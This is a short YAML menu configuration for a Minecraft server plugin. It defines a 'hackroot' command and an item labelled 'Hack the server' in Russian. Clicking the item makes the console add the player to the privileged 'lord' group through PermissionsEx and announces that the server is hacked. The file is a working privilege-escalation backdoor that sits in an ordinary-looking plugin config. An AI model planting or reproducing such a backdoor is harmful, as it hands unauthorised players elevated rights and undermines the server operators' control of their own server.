menu-settings:
  name: 'Взлом * + /pex'
  rows: 3
  command: 'hackroot'
root:
  COMMAND: 'console:pex user {player} group set lord;console:tell {player} &aСервер взломан!'
  NAME: '&cВзломать сервер'
  LORE:
    - '&fНажмите для &aвзлома'
  ID: '322:1'
  POSITION-X: 5
  POSITION-Y: 2